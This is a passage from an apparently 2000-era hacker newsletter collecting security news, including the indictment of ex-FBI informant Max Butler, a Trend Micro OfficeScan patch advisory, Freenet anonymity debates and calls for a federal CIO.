      Butler, also known as Max Vision, was also a self-described ``ethical 
      hacker'' from the Silicon Valley who boasted that he could test the 
      security of any computer system by penetrating it. 

      But Butler's cyber activity went too far, federal authorities say. 

      Butler, 27, of Berkeley appeared in federal court in San Jose yesterday on 
      a 15-count federal indictment charging him with hacking into computers 
      used by the University of California at Berkeley, national laboratories, 
      federal departments, air force bases across the country and a NASA flight 
      center. 

      Butler posted $50,000 cash bail yesterday after U.S. Magistrate Judge 
      Patricia Turnbull ordered him not to use computers except for work. Butler 
      and his attorney, Jennifer Granick of San Francisco, could not be reached 
      for comment. 

      The indictment, handed down March 15, said Butler caused ``reckless 
      damage'' as a result of intrusions in May 1998. Butler was also charged 
      with possession, with intent to defraud, of 477 passwords belonging to 
      customers of a Santa Clara-based Internet service provider. 

      The case underscores the potential risks involved when law-enforcement 
      agencies use confidential informants with access to sensitive information. 

      ``Sources are often very close to criminal activity, and sometimes they 
      cross the line,'' said Special Agent George Grotz, an FBI spokesman in San 
      Francisco. 

      Grotz declined to say how Butler became an FBI informant and whether he 
      was a federal source at the time of the alleged crimes. Grotz said Butler 
      is no longer associated with the agency. 

      Friends of the suspect told the Associated Press that Butler was caught 
      possibly violating the law several years ago and began working with the 
      FBI to avoid charges. Seth Alves, 27, told the news agency that Butler was 
      unfairly targeted after refusing to comply with an FBI request. 

      A 22-month investigation by the FBI and military investigators ended 
      Tuesday morning when federal agents converged on a home on Dwight Way near 
      the UC Berkeley campus, where Butler lives with his 23-year-old wife, 
      Kimi Winters. No one answered the door. Butler turned himself in to the 
      FBI in Oakland later that day. 

      Butler grew up in Idaho and lived with his family in Washington, where 
      authorities said he has a 1997 misdemeanor conviction for attempted 
      trafficking of stolen property. 

      He developed a proficiency with computers, eventually attracting the 
      attention of the FBI's Computer Crime Squad, which used him as a 
      confidential informant. 

      An FBI search warrant affidavit said Butler was ``well known'' to squad 
      members and ``has provided useful and timely information on computer 
      crimes in the past.'' 

      In 1997, Butler started a company known as Max Vision in Mountain View, 
      specializing in ``penetration testing'' and ``ethical hacking'' procedures 
      in which he would simulate for clients how a hacker would penetrate their 
      computer systems, according to the company Web site. 

      ``Our client penetration rate is currently 100 percent,'' the site said, 
      with recent clients including a large consortium of telecommunications 
      companies, a major motion picture company and an e-commerce online auction 
      service. 

      By 1998, Butler was living with Winters in a one-story San Jose apartment, 
      where the couple started up their own Web-design company, Kimi Networks, 
      records show. Reached by telephone yesterday, Winters hung up on a 
      Chronicle reporter.

      It was also from that apartment, according to the FBI, that Butler hacked 
      into computers by using a computer software vulnerability known as a 
      buffer overflow, which sends commands into a system that ordinarily would 
      not be allowed. 

      Butler also allegedly invaded computers used by the Lawrence Berkeley 
      National Laboratory. Vern Paxson, a computer scientist at the lab, noticed 
      an online intruder conducting unauthorized scans of laboratory and UC 
      Berkeley computers in May 1998 and used a monitoring device that later 
      helped identify the source of the intrusions. 

      Paxson said yesterday that Butler's arrest was ``somewhat ironic'' but 
      ``not totally surprising.'' 

      Paxson said a person later identified as Butler even sent him an 
      apologetic e-mail a day after the computer intrusions. Butler also somehow 
      obtained a confidential incident report Paxson had filed about the 
      invasions, Paxson said. 
      
      @HWA
      
      
68.1  KYXSPAM: More on Max Vision.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
    
      Source: Dragos (email)
      
      Further info from Dragos Ruiu and the Kyxspam world domination conspiracy
      
      url: http://www.mediacentral.com/channels/allnews/03_23_2000.reutr-story-N23354790.html

      Ex-FBI source charged with hacking 

      SAN JOSE, Calif., March 23 (Reuters) - A man officials say was once a 
      confidential FBI source on computer hackers has been charged with 
      allegedly breaking into computer systems belonging to NASA, the military 
      and the U.S. departments of energy, defense and transportation, the U.S. 
      Attorney's office said. 

      Max Ray Butler, 27, also known as Max Vision, was due to appear in court 
      on Thursday to face charges of breaking into and damaging computers as 
      well as possessing the passwords of customers of California Internet 
      service provider Aimnet. 

      The indictment's 15 counts carry fines ranging from $5,000 up to $250,000 
      and jail terms totaling more than 50 years in prison, said officials at 
      the U.S. Attorney's office in San Francisco. 

      A Federal Bureau of Investigation affidavit filed to support a search of 
      his home showed Butler, of Berkeley, Calif., was a confidential source for 
      FBI agents tracking computer crimes before authorities began their 
      22-month investigation of him in May 1998. 

      Butler, being held in lieu of $100,000 bond, surrendered on Tuesday to 
      authorities in Oakland. He was scheduled to attend a bail review hearing 
      on Thursday in U.S. District Court in San Jose. 

      The arrest comes amid growing concern over a number of recent high-profile 
      computer hacker attacks. 

      But authorities said there is no connection between Butler and the 
      "denial-of-service" attacks in early February that temporarily cut off 
      customers to some of the Web's biggest sites, including Yahoo!, eBay, 
      Amazon.com and E-Trade. 

      "There are no allegations related to denial-of-service attacks but we 
      would characterize this as a serious case," said U.S. attorney Ross 
      Nadler, chief of the office's newly created Computer Hacking and 
      Intellectual Property unit. 

      Lawyers for Butler could not be reached for comment. 

      The FBI, the U.S. Air Force, NASA and the U.S. Navy began an investigation 
      after several U.S. Air Force computer systems around the country were 
      attacked in May 1998, although it was unclear when Butler became their 
      focus. 

      Butler is accused of hacking into computers belonging to the U.S. 
      Department of Energy's Argonne National Laboratories in Illinois and the 
      Brookhaven National Laboratory in New York; NASA's Marshall Flight Center 
      in Alabama; the office of the Secretary of Transportation in Washington, 
      D.C.; the office of the Secretary of the Department of Defense in 
      Washington, D.C.; and unspecified facilities of the Department of Defense, 
      and IDSoftware of Mesquite, Texas. 

          

      © 2000 Reuters Limited. All rights reserved.  
      
      
      -=-
      
      
      

     From: Dragos Ruiu <dr@dursec.com>
     To: <*>
     Sent: Thursday, March 23, 2000 2:51 PM


     (Hmmm.... thanks Ken for the head's up. I am also in agreement:
     I don't know any of the details of the incident, but I do know that Max
     has been a valuable resource and has contributed enormous amounts
     of effort and knowledge to the entire computer security field. 
     I hope that alone is of some mitigating consideration...     --dr)
 
 
     Berkeley man indicted, charged with hacking government computers  
 
     Copyright © 2000 Nando Media
     Copyright © 2000 Associated Press
   
 
     SAN FRANCISCO (March 23, 2000 8:20 a.m. EST http://www.nandotimes.com) - 
     A suspected computer hacker appeared in court for the first time Wednesday
     after being indicted on charges of breaking into computers belonging to 
     NASA and the U.S. departments of energy, defense and transportation, 
     federal prosecutors said. 
 
     Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during 
     the hearing in San Jose. On March 15, he was indicted on 15 criminal counts,
     including unauthorized access of a computer, recklessly causing damage and 
     interception of electronic communication. 
 
     All the counts carry sentences of at least six months and fines of 
     hundreds of thousands of dollars. 
 
     Butler, who also goes by the name of Max Vision, had been an FBI source,
     helping agents solve computer crimes, authorities said. He turned himself
     in Tuesday. 
 
     Butler's attorney did not return a telephone call seeking comment. 
 
     -- 
     dursec.com / kyx.net - we're from the future        http://www.dursec.com
     learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver 
 
     Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
               RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, 
               Max Vision/whitehats.com
               
               
      -=-
      
      From: Dragos
      
      (I guess one of the interviews on radio ran this morning.
      This showed up on a local (MyBC) news page too,
      funny... I don't remember giving that quote to them.
      But out of all the negative light they could have 
      shone I'm happy with the way it was handled.    --dr) 
 
      url: http://www2.mybc.com/bc/news/fs.cfm?id=172752

      Friday , Mar 24, 2000 

      Guest speaker busted

      VANCOUVER (CKNW/AM980) -- An expert on Internet security who was scheduled
      to speak at a Vancouver conference has been arrested by the FBI. 

      Max Butler is charged with hacking into computers and destroying information.
      One of the organizers of the local conference, Dragos Ruiu of Dursec-dot-com,
      says that Butler was very well known among those in the information technology
      sector.

      "He ran an intrusion database, kind of like a big listing of signatures that
      people use to watch for hackers intruding into their network, and it was quite
      a famous database," said Ruiu. "Lots of Fortune 500 companies and big sites 
      use his database as a way of protecting their networks." 

      Ruiu is now scrambling to find a replacement for Butler. The conference 
      runs May 10-12. 
      
      -=-
      


      @HWA


69.0  HNN:Mar 24th:Koreans Attempt to Learn Security Secrets 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Apocalyse Dow 
      The Korean Advanced Institute of Science and
      Technology (KAIST) will conduct a 'hacking contest'.
      The contest is set to start in June and will offer 100
      Million Won in prize money for defeating a firewall. (If
      they really expect to get anything out of this other than
      publicity they are sadly mistaken.) 

      Chosun 
      http://www.chosun.com/w21data/html/news/200003/200003220527.html
      
                
       KAIST to Hold Hackers Contest 

       An international hacking contest will be held under the auspices of the
       Korean Advanced Institute of Science and Technology (KAIST) it was
       announced Wednesday. The Information Protection Education Research
       Center of the institute which formally opened the same day said that it will
       inject W300 million to host the First World Information Protection Contest
       (WIPC) in June. 

       The contest will have hackers attempt to break into a firewall the center has
       built. A total of W100 million prize money is prepared for the event, which
       aims to find out the international standard of hackers and to test the capacity
       of Korean information protection technology. 

       (Sim Jae-yool, jysim@chosun.com) 
      
      
      @HWA


70.0  HNN:Mar 24th:Rack Mount Your iMac 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      Found on Slashdot 
      This has been posted elsewhere; it is just too cool not to
      link to. Who would have ever thought of hacking an
      iMac into a rack-mount? Definitely a cool hardware
      hack. 

      The iMac Rack-Mount Project        
      http://imac.pointinspace.com/
      
      (Surf to the URL homeboyie! pics and plans available 
            for this kewl hack, someone found a use for the iMac??
                   - Ed)
      
      
      @HWA
      
      
71.0  HNS:Mar 24th:SECRETS STOLEN
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS (Help Net Security) http://www.net-security.org/
      
       
      by BHZ Friday 24 March 2000 on 5:57 PM
      British police said today they were hunting a thief who had stolen a
      secret service computer containing confidential information on
      Northern Ireland.
      Link: Yahoo!      
      
      http://dailynews.yahoo.com/h/nm/20000324/tc/britain_spies_1.html
      
      Friday March 24 10:18 AM ET 

      British Intelligence Laptop Stolen at Station

      LONDON (Reuters) - British police said Friday they were hunting a thief 
      who had stolen a secret service computer containing confidential 
      information on Northern Ireland.

      The laptop computer was snatched while an employee of Britain's domestic 
      security service, MI5, was buying a ticket at London's Paddington train 
      station.

      ``I can confirm that a laptop computer was stolen from the security 
      service employee on March 4 at Paddington Underground (station),'' said a 
      government official who declined to be identified.

      ``The information contained in the laptop was well protected and we 
      believe it to be secure. We are not prepared to discuss the nature of the 
      material.''

      The information on the computer was understood to be heavily encrypted and 
      was related to the situation in Northern Ireland, but not to refer to the 
      state of the peace process or any guerrilla threat.

      A spokesman for Prime Minister Tony Blair said officials were always 
      concerned at the loss of any sensitive material, but they were confident 
      it was secure and that national security had not been threatened.

      ``We believe this is an opportunistic theft and not a deliberate attempt 
      to gain access to security service information,'' he said.

      Asked why agents were walking around with security information on 
      computers, the spokesman said there were strict procedures for moving 
      classified material. ``You can certainly say they've been tightened since 
      this incident,'' he added.

      The Sun newspaper said a squad of 150 police were working around the clock 
      to catch the thief. Before the start of the 1991 Gulf War in Kuwait and 
      Iraq, a laptop said to have contained war plans was stolen from the car of 
      a Royal Air Force officer, who lost his job as a result.

      The latest theft comes as the peace process in Northern Ireland is in 
      disarray.

      Last month Britain decided to suspend a fledgling home-rule government 
      over lack of progress on disarmament by Irish Republican Army guerrillas. 

      @HWA
      
72.0  HNS:Mar 24th:PATCH RELEASED BY TREND MICRO
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From HNS (Help Net Security) http://www.net-security.org/

      by BHZ Friday 24 March 2000 on 5:43 PM
      Trend Micro has released a patch that eliminates server security
      vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier
      versions, running on Windows NT 4 server with Internet Information
      Server(IIS).
      Link: Bugware
      http://www.net-security.org/cgi-bin/bugs/fullnews.cgi?newsid953916142,40085,      
      
      Patch available for OfficeScan vulnerability
      Posted to BugTraq on March 24, 2000
 
      Security Focus BugTraq ID: 1057
 
      Posted: March 22, 2000
 
      Summary
      =======
      Trend Micro has released a patch that eliminates server security
      vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier
      versions, running on Windows NT 4 server with Internet Information
      Server (IIS). These versions of OfficeScan allow intruders within a
      firewall to invoke OfficeScan CGIs on the server without
      authentication - bypassing OfficeScan management console
      password protection. These OfficeScan CGIs are intended for
      administrators to manage OfficeScan antivirus running on networked
      workstations via the OfficeScan management console. By gaining
      access to execute these CGIs, hackers can use them to change
      OfficeScan antivirus configurations or to uninstall OfficeScan
      antivirus on the desktops.
 
      Issues
      ======
      Trend OfficeScan version 3.51 or earlier versions apply inadequate
      security settings on the OfficeScan server CGI components. If a
      malicious user has the ability to connect to the OfficeScan server
      via a web browser, these CGIs can be executed to send valid
      commands - including the uninstall command - to OfficeScan clients. In
      addition, OfficeScan's implementation of user authentication in its
      management console - password protection - was insufficiently
      encrypted, and allows a malicious user to decrypt the password and
      gain access to the OfficeScan management console. 
 
      Implementation
      ==============
      Trend Micro has released a patch that will secure access to the
      OfficeScan CGIs on the server. The patch program changes the file
      permissions on the OfficeScan CGIs, so only administrators can
      access and execute them. This patch works only on drives
      formatted to use Windows NT file system (NTFS). After applying this
      patch, hackers will no longer be able to remotely invoke OfficeScan
      CGIs without being authenticated as an administrator by NTFS
      security. This patch also prevents hackers who sniff for the OfficeScan
      management console password over the network from gaining
      access to the OfficeScan management console. Access to the
      OfficeScan management console or to execute OfficeScan CGIs
      now requires NTFS authentication.
 
      Affected Software Versions
      ==========================
      Trend OfficeScan Corporate Edition 3.0
      Trend OfficeScan Corporate Edition 3.11
      Trend OfficeScan Corporate Edition 3.13
      Trend OfficeScan Corporate Edition 3.50
      Trend OfficeScan Corporate Edition 3.51
      Trend OfficeScan for Microsoft SBS 4.5
 
      This vulnerability is only present when the above software version is
      installed on a Windows NT server with IIS. It is not present when the
      above software version is installed on Novell NetWare servers or
      Windows NT server without IIS.
 
      Patch Availability
      ==================
      OfficeScan Unauthenticated CGI Usage patch can be downloaded
      from:
 
      http://www.antivirus.com/download/ofce_patch.htm
 
      More Information
      ================
      Please see the following references for more information related to
      this issue. 
      - Trend Micro Security Bulletin:
      http://www.antivirus.com/download/ofce_patch_351.htm
      - Frequently Asked Questions: Trend Micro Knowledge Base
      http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8
 
      Obtaining Support on this Issue
      ===============================
      This is a fully supported patch. Information on contacting Trend
      Micro Technical Support is available at 
      http://www.trend.com/support/default.htm
 
      Acknowledgements
      ================
      Trend Micro thanks Gregory Duchemin
      http://www.securite-internet.com and Elias Levy
      http://www.securityfocus.com for reporting the OfficeScan server
      vulnerability to us, and working with us to protect our customers.
      
      @HWA
      
73.0  HNS:Mar 24th:PRIVACY ISSUES
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by BHZ Friday 24 March 2000 on 5:32 PM
      The idea that privacy and security might be symptoms and not the
      problem emerged from a recent Webmaster focus group discussion
      with the Office of Personnel Management on defining Webmaster
      classifications. 
      Link: FCW
      http://www.fcw.com/fcw/articles/2000/0320/web-dotgov-03-23-00.asp
      
      COMMENT

      Privacy, security on the Web require business
      know-how 

      FCW's Dot-gov Thursday column

      BY Rich Kellet 
      03/23/2000 

      The idea that privacy and security might be symptoms and not the problem emerged
      from a recent Webmaster focus group discussion with the Office of Personnel
      Management on defining Webmaster classifications. 

      We worked through the usual issues of defining technology Webmasters and content
      Webmasters. As we moved from the discussion of specialists to the issue of World
      Wide Web managers, an interesting perspective emerged from our discussions.
      Anecdotes and informal surveys are showing that about half of the Webmaster
      community works in mission-oriented program offices, which are not information
      technology organizations. 

      This led to a discussion of the difference between managers in program
      organizations and managers in technology organizations. Web managers in program
      organizations tend to be business managers and Web managers in IT organizations
      tend to be technology managers. The conclusion of this discussion was to define a
      "breed" of Web manager under an IT series that is a technology manager or "Web
      technology manager." 

      So, what about the concept of a classification for a Web business manager? I asked
      the group if anyone knew of a classification for business managers in the federal
      government. To my surprise, there does not appear to be one. 

      It is important to pause at this point and consider what this means. Individuals who
      obtain business degrees, undergraduate or higher, have qualifications in an area
      recognized by the private sector as a unique skill and a profession in its own right.
      These skills are essential to running large programs that deliver the government's
      products and services to the public or other agencies. 

      When I developed the top skill areas that a federal Web manager needs so that the
      Webmaster can deliver programs online, to my own surprise, most of the required
      skills originated from business skills, such as accounting and financial management
      and budgeting. 

      As I looked across government, I found surprisingly little information on what it
      means to run a business in the federal government context. There is plenty of
      information on, for instance, project management, but managing a project is not
      running a business. There is plenty of information on policy, but carrying out policy
      is not a running business. There is plenty on management, but management skills are
      not the only skills required to run a business. 

      Courses in small business or college programs in business administration provide
      samples of the curriculums that define the skills needed to run a business. Running a
      business over the Web in government is about understanding, integrating and
      applying principles and processes related to leadership, culture, business processes
      and components, management, policy, and technology into a functioning
      organization that delivers a set of products and services to the public or other
      agencies. 

      The issues of privacy and security are difficult to incorporate into Web sites
      because they challenge our abilities as business managers. Privacy and security are
      not "modules" you can buy off the shelf. It is not solely a technology issue, a people
      issue or a system issue. Privacy and security are "embedded and threaded"
      throughout the business processes, the organization's working knowledge and the
      supporting technology infrastructure. 

      At each level of the architecture and in the operations of the business, people and
      assets (routers, servers, operating systems and other components), Webmasters
      must incorporate privacy and security concepts and solutions. To solve privacy and
      security requires a commitment to re-inventing business processes, developing the
      organization's business and technology skills, and improving the underlying
      infrastructure. 

      This is the stuff of a Web business manager. This is far beyond just "plugging holes"
      in operating systems or applications. Solving privacy and security is an
      enterprisewide issue that requires Web business leaders working with other business
      leaders in the agency. 

      With the Web becoming the central construct for delivering products and services,
      the government is going to need Web business managers. We have many now, and
      we need to continue to grow this portion of the work force. 

      So, where does that leave us? Not surprisingly, it is a business decision to decide
      whether to solve these issues by funding them appropriately, to develop business
      processes that incorporate privacy and security, and to build and continuously
      improve our organizational knowledge for putting in place privacy and security
      solutions. We can spend a lot of time on chasing privacy or security holes or solve
      the problem more efficiently and in less time by looking at the whole business. 

      -- Kellet is founder of the Federal Web Business Council, co-chair of the Federal
      Webmaster Forum, and is director of GSA's Emerging IT Policies Division. 



      @HWA
      
74.0  HNS:Mar 24th:TARGETING ONLINE SCAMMERS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ Friday 24 March 2000 on 11:34 AM
      Law enforcement officials from 27 countries and 45 states have
      conducted a massive sweep of the Internet searching for
      "get-rich-quick" schemes and scams, the Federal Trade
      Commission said Thursday.
      Link: ZDNet
      
      http://mcafee.snap.com/main/page/pcp/cd/0,85,-1715-1085412-303380,00.html      
      
      
      Authorities target online
      scammers
      By Margaret Kane, ZDNet News 
      03/23/2000 10:22
 
 
      Law enforcement officials from 27 countries and
      45 states have conducted a massive sweep of
      the Internet searching for "get-rich-quick"
      schemes and scams, the Federal Trade
      Commission said Thursday. 
 
      More than 1,600 sites were uncovered in the
      "Get-Rich-Quick.con" program, one of several
      "surfs" the agency conducted looking for problems
      and crimes on the Net. 
 
      The latest sweep hooked up law enforcement
      officials across state and national borders and
      involved hundreds of researchers who scoured the
      Net for scam artists. 
 
      Many languages, one voice
 
      "We want them to know that the borderless Internet
      marketplace is not a free zone for fraud," said Jodie
      Bernstein, director of the FTC Bureau of Consumer
      Protection. "Though we speak different languages on
      the subject of Internet fraud, we speak with one
      voice. Our message is: Con artists will not threaten
      the safety of the Net." 
 
      'We're going to run them out of town, and run them
      off the Web' -- Drew Edmondson, Oklahoma attorney
      general
 
      Some of the schemes promised users rewards such as
      "surf the Net and earn $100 an hour," he said.
      Authorities also found a variety of pyramid schemes,
      outrageous product claims and outright fraud. 
 
      The sites are sent e-mail warnings, and
      documentation of the sites is provided to law
      enforcement agencies in the various jurisdictions,
      which will be able to further investigate and press
      charges, if necessary. 
 
      Bernstein said the agencies could begin filing
      charges in June or July. 
 
      Calling out the cyberposse
 
      "As an old prosecutor I'm looking forward to Phase
      Two. Once we've investigated, as the old sheriff would
      do, we're going to run them out of town and run them
      off the Web," said Drew Edmondson, Oklahoma attorney
      general. "And where appropriate we'll put them in jail." 
 
      It came as no surprise to speakers at Thursday's
      news conference that con artists have migrated
      onto the Web. About half of the U.S. Postal
      Service's mail fraud investigations begin as online
      solicitations, said Lawrence Maxwell, USPS
      inspector in charge of fraud, prohibited mailings and
      forfeiture investigations. 
 
      It's easy for con artists to target consumers "in an
      age dominated by a 'Who Wants to be a Millionaire'
      mentality," said Richard Walker, enforcement
      director for the Securities and Exchange
      Commission. 

      
      
      @HWA
      
75.0  HNS:Mar 24th:FEARS OF FREENET
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by BHZ Friday 24 March 2000 on 11:30 AM
      A report by a British scientific magazine suggests that an
      anonymous Internet system designed to guarantee free speech
      online could be used by child pornographers, terrorists and others
      with less-than-pristine purposes.
      Link: Computer Currents
      
      http://www.currents.net/newstoday/00/03/24/news5.html



      Daily News
      Freenet Raises Security
      Fears
      By Martin Stone, Newsbytes
      March 24, 2000
 
      A report by a British scientific magazine suggests that an
      anonymous Internet system designed to guarantee free speech
      online could be used by child pornographers, terrorists and
      others with less-than-pristine purposes.
 
      A Reuters report today said a New Scientist magazine article
      on the Freenet program, which was created by Edinburgh
      University graduate Ian Clarke and others to make tracing file
      originators impossible, thereby giving dissidents in countries
      without free speech a voice, could be misused by those with
      sinister designs.
 
      The report stated that the Internet Watch Foundation, an
      independent body monitoring Web sites in Britain, fears the
      decentralized system could make policing the Net and tracking
      down computer crimes even more difficult.
 
      "There is clear potential for misuse by criminals, terrorists and
      pedophiles," Roger Darlington, chairman of the foundation, told
      the weekly magazine in its latest issue, Reuters reported.
 
      Users of Freenet are difficult to track down because files do not
      contain a unique Web address and are distributed on
      computers belonging to Freenet members. To retrieve a file,
      users enter the key, Reuters said.
 
      According to Clarke, a single computer user cannot be held
      responsible for Freenet files because the originator cannot be
      traced.
 
      "It's perfect machine anarchy," he is quoted as saying. "No
      single computer is in control."
 
      Reported by Newsbytes.com
      
      @HWA      
      
      
75.1  Anonymous net access aiding and abetting online criminals?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From: Dragos Ruii
      
      url: http://www.wired.com/news/technology/0,1282,34768,00.html

      Alternative Net Protects Pirates 
      by Leander Kahney 

      3:00 a.m. 8.Mar.2000 PST 
      Open-source advocates are developing an alternative publishing network 
      that promises to provide true anonymity in sharing documents and files 
      over the Internet. 

      But in addition to protecting free speech, the new system also could be a 
      boon for multimedia pirates. 

      Freenet is an open-source file-transfer system similar to the Web for 
      sharing digital content such as HTML pages and MP3 music files. It will be 
      run by connected clusters of servers or node stations that could in turn 
      be run on almost any PC connected to the Internet. 

      But unlike the Web, Freenet has no centralized administrative 
      infrastructure of domain name servers (DNS) and IP addresses that can be 
      used to track users. Hosting and replicating documents and files requires 
      that Freenet backers volunteer their time and resources. 

      Because Freenet aims to be anonymous, secure, and without centralized 
      control, it would make it almost impossible to trace people who post 
      content -- legal or otherwise -- onto the network. 

      "My primary motivation was to make it very difficult to censor 
      information," said Ian Clarke, an Irish programmer who designed the 
      system. "With the Internet there's the potential to censor and monitor 
      people to a degree that's never been possible before. I wanted to develop 
      the technology to make this impossible."

      Clarke started work on Freenet 18 months ago as a graduate student in 
      artificial intelligence at Edinburgh University. 

      He had been outraged by the Australian government's proposal to introduce 
      sweeping censorship laws, which went into effect in January.

      Clarke hopes to launch the first public version in the spring, but he said 
      the system is still pretty rough. The server is nearly finished, but so 
      far there are no browsers, or clients, to make the network easy to use.

      Freenet software will be released under the GNU public license, which will 
      allow anyone to freely distribute and change the source code. The system 
      is being written in Java by about a dozen programmers internationally. 
      They have never met nor even spoken over the phone -- all communication is 
      by email, Clarke said. 

      Both authors and readers can choose to be anonymous if they so wish, 
      Clarke said. Like the Web, the network is navigated by a client, or 
      browser. 

      He said it will even be difficult to determine if someone is running a 
      Freenet server and what information is being stored on it, Clarke said. 

      Alex Fowler of the Electronic Frontier Foundation said that while he 
      generally supports anti-censorship tools, Freenet could create as many 
      problems as it solves. 

      Fowler said that Freenet could be a useful tool in countries like 
      Singapore or China that censor the Net or quash free speech. But he 
      doesn't like the idea that you wouldn't be able to remove sensitive 
      information -- such as someone's medical records.

      "There's no way to tell if a project like this will actually take off," he 
      said. "It's certainly going to raise some questions with a whole lot of 
      people. Not just copyright holders, but governments too."

      Patrick Ball, deputy director of the Science and Human Rights Program with 
      the American Association for the Advancement of Science, said tools like 
      anonymizers, strong cryptography, and Freenet tend not to help activists 
      who are not already under surveillance because using them is in itself 
      suspicious and tends to alert the authorities. 

      "I'm for any application that protects dissidents," he said. "But there's 
      a higher order problem that's very difficult to get around, and that's by 
      using these tools you draw attention to yourself." 

      Although Clarke designed Freenet to protect free speech, he thinks that 
      the safeguards they are building in to make it difficult to track down 
      those who distribute content could lead to its notoriety as a vehicle for 
      copyright piracy.

      The system was designed to make it impossible to find out where files are 
      physically stored. Information posted to the network is stored on multiple 
      servers simultaneously, making it difficult to remove a file. 

      In fact, Clarke said any attempt to remove information causes it to be 
      copied to other servers on the network. 

      The only way to remove information is to disable the entire network, which 
      may prove difficult if it becomes popular and is running on thousands of 
      PCs all over the globe.

      However, Clarke said the network cannot be guaranteed to permanently store 
      information. Only popular files survive for any period of time. Older, 
      unpopular files would be overwritten by more popular ones. 

      "As a project we don't want to be labeled as hackers who distribute warez 
      or copyrighted material," he said. "The purpose of Freenet is to promote 
      freedom of information, but there is an inevitable consequence there that 
      it might lead to violation of copyright law."

      "The potential for protecting freedom of speech is more important than 
      protecting copyright, which is an economic tool," Clarke added.

      Clarke noted that Freenet can be functionally identical to Napster, the 
      wildly popular network for sharing music online. But while the Recording 
      Industry Association of America is currently seeking a court order to shut 
      down Napster's central servers, it would be almost impossible to disable a 
      Freenet network running on machines all over the world.

      "Because it's decentralized no one can be held responsible for it," Clarke 
      said. "Once it's released there's no point coming after me because there's 
      nothing I, nor anyone else, can do to shut it down."

      Eric Sheirer, a music technology researcher at MIT's Media Lab, said 
      Freenet is an interesting experiment, but said it would likely be used 
      only by a small community of pirates and "privacy nuts."

      "If it is adopted, it will be adopted by people who want to exchange 
      illegal information and by people who are rabid about privacy and 
      security, which is a relatively small universe," Sheirer said. 

      Sheirer pointed out that the Web is trustworthy because of the content on 
      certain domains, and he likes the convenience of tracking devices such as 
      cookies that remember log-in names and passwords.

      "Many of the advantages of Freenet are disadvantages to me," he said.

      Nonetheless, Sheirer said the advent of Freenet and Gnapster, an 
      open-source clone of Napster, illustrated the need for debate about 
      copyright laws in the age of ubiquitous digital distribution channels.

      "There are larger questions about the implications of these technologies," 
      Sheirer said.
      
      @HWA
      
      
76.0  HNS:Mar 24th:FEDERAL CIO NEEDED
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by BHZ Friday 24 March 2000 on 11:29 AM
      Former Senate Year 2000 Committee Chairman Sen. Robert
      Bennett, said Thursday that the numerous legislative and agency
      efforts to address cyber security may need the guidance of a single
      "chief information officer" to coordinate the government's cross
      agency and trans-industry security measures.
      Link: Computer Currents
      
      http://www.currents.net/newstoday/00/03/24/news16.html
      
      Federal CIO Needed for
      Web Security
      By Brian Krebs, Newsbytes
      March 24, 2000

      Former Senate Year 2000 Committee Chairman Sen. Robert
      Bennett, R-Utah, said Thursday that the numerous legislative
      and agency efforts to address cyber security may need the
      guidance of a single "chief information officer" to coordinate the
      government's cross agency and trans-industry security
      measures.

      Speaking at a US Chamber of Commerce meeting, "Cyber
      Security: The Real Y2K Challenge," Bennett said that, while it
      is up to company CEOs to ensure the security of their own
      Web sites, the federal government can and should provide an
      overarching structure for that effort.  Bennett said the Clinton
      administration's  Critical Infrastructure Assurance Office (CIAO)
      - the agency charged with coordinating the federal government's
      cyber security efforts - was a good start, but also highlighted a
      need for leadership on the issue.

      "Every company has a chief information officer, and I think
      eventually the government would need its own CIO, maybe even
      at the cabinet level position," Bennett said. "But this is not
      going to happen quickly."

      Over the past few weeks, a handful of public officials have
      called for a federal government CIO to coordinate the
      government's many efforts. Last week before the House
      Subcommittee on Government Management, Information, and
      Technology, Chairman Stephen Horn, R-Calif., pointed to the
      government's many security management players and asked
      whether there shouldn't be one entity coordinating the
      government's efforts.

      "Y2K underscored the need for a disciplined management
      approach to problem solving," Horn said. "That type of
      commitment will be equally important as we turn to the second
      technological challenge of the New Year - computer security."
      Horn then turned to the witnesses, asking, "Could the Koskinen
      model work here?"

      At today's meeting, Bennett told reporters that, regardless of
      the model Congress ultimately chooses, he has heard from
      Koskinen himself on the issue.

      "He told me that with regard to the Critical Infrastructure
      Protection program: 'You have my very best wishes, but you
      will do it without me,'" Bennett said.

      Bennett said the responsibility for protecting the confidentiality
      and security of corporate information rests squarely on the
      shoulders of company CEOs, and those who wait for the
      government to step in with legislative remedies will find their
      sites hacked and their business secrets revealed.

      "This is a CEO and survival issue, not something you leave to
      the techies," he said. "The reality is that if somebody decides
      they want to break into your company and steal your secrets,
      they can do that."

      Bennett urged CEOs in attendance to shift to the mode of
      urgency and cooperation that made Y2K such a non-event, and
      emphasized the need for lawmakers and CEOs to take a
      "horizontal" view of their organization and how weaknesses in
      their companies' systems can affect other companies on the
      network.  

      "We're not thinking horizontally enough in Congress and
      industry," Bennett said. "Nobody's interested in stovepiping: I
      don't care if your company is secure or not, but I do care if
      you're connected to the Internet."

      Bennett said that, given the hectic schedule that Congress is
      working at this session, it was likely that few of the many
      proposed bills to address cyber security would pass this year.
      But, he said, the bills were necessary to keep the dialogue
      going.

      Reported by Newsbytes.com, http://www.newsbytes.com .


